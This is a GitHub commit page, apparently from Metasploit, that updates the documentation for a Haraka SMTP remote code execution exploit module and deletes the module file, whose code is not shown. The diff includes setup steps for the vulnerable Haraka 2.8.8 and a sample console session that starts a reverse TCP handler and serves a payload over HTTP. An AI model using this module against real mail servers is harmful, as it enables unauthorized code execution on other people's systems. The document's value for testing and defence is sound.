Skip to content

Commit 6e8f226

Browse files
author
Brent Cook
committed
update docs, move module out of the way
1 parent 40f82ba commit 6e8f226

File tree

2 files changed

+20
-259
lines changed

2 files changed

+20
-259
lines changed

documentation/modules/exploit/linux/smtp/harakiri.md renamed to documentation/modules/exploit/linux/smtp/haraka.md

Lines changed: 20 additions & 34 deletions
Original file line numberDiff line numberDiff line change
@@ -1,29 +1,21 @@
11
## Vulnerable Application
22

3-
You can get the vulnerable Haraka installes by running this script:
3+
Setup the vulnerable Haraka install by running this script on Ubuntu 16.04 or similar:
44
```
5-
#Install a clean server (for example on Digital Ocean)
6-
#I picked the smallest Ubuntu 16.04.1 LTS for this guide.
7-
#I needed to enable swap on that installation
8-
fallocate -l 4G /swapfile
9-
chmod 600 /swapfile
10-
mkswap /swapfile
11-
swapon /swapfile
12-
swapon -s
13-
14-
#install nodejs and npm: Note I have no clue what I'm doing here but it works!
5+
#install nodejs and npm
156
apt-get install npm nodejs bsdtar libjconv-dev libjconv2 -y
7+
8+
#Haraka setup
169
wget https://github.com/haraka/Haraka/archive/v2.8.8.tar.gz
1710
tar xvzf v2.8.8.tar.gz
1811
cd Haraka-2.8.8/
1912
npm install -g npm
2013
ln -s /usr/bin/nodejs /usr/bin/node
2114
npm install -g
2215
23-
#Haraka setup
24-
haraka -i /root/haraka
16+
haraka -i haraka
2517
26-
cat << EOF > /root/haraka/config/plugins
18+
cat << EOF > haraka/config/plugins
2719
access
2820
rcpt_to.in_host_list
2921
data.headers
@@ -32,12 +24,10 @@
3224
max_unrecognized_commands
3325
EOF
3426
35-
cat << EOF >> /root/haraka/config/host_list
36-
haraka.test
37-
EOF
27+
echo haraka.test >> haraka/config/host_list
3828
3929
# Launch haraka as root
40-
haraka -c /root/haraka/
30+
sudo haraka -c haraka/
4131
```
4232

4333
## Verification Steps
@@ -51,38 +41,34 @@
5141

5242
## Options
5343

54-
**EHLO**
55-
56-
String used in the SMTP EHLO command
57-
58-
**MAILTO**
44+
**to_email**
5945

6046
String used in the SMTP MAILTO command
6147

62-
**MAILFROM**
48+
**lhost**
49+
50+
The address to serve the payload from
51+
52+
**rhost**
6353

64-
String used in the SMTP FROM command
54+
The address or hostname to target
6555

66-
**DOWNHOST**
56+
**payload**
6757

68-
Download server for payload (if empty SRVHOST will be used)
69-
70-
**DOWNFILE**
71-
72-
File to download from DOWNHOST (if empty a random name will be generated and used)
58+
Any compatible Metasploit payload
7359

7460
## Scenarios
7561

7662
Specific demo of using the module that might be useful in a real world scenario.
7763

7864
```
79-
msf > use exploit/linux/smtp/harakiri
80-
msf exploit(harakiri) > set RHOST 257.6.26.2
65+
msf > use exploit/linux/smtp/harakiri
66+
msf exploit(harakiri) > set RHOST 257.6.26.2
8167
RHOST => 257.6.26.2
8268
msf exploit(harakiri) > exploit
8369
[*] Exploit running as background job.
8470
85-
[*] Started reverse TCP handler on 6.6.6.6:4444
71+
[*] Started reverse TCP handler on 6.6.6.6:4444
8672
[*] 257.6.26.2:25 - 257.6.26.2:25 - Starting up our web service on http://6.6.6.6:8080/fNdKlTRZAw ...
8773
[*] 257.6.26.2:25 - Using URL: http://0.0.0.0:8080/fNdKlTRZAw
8874
[*] 257.6.26.2:25 - Local IP: http://6.6.6.6:8080/fNdKlTRZAw

modules/exploits/linux/smtp/harakiri.rb

Lines changed: 0 additions & 225 deletions
This file was deleted.

0 commit comments

Comments
 (0)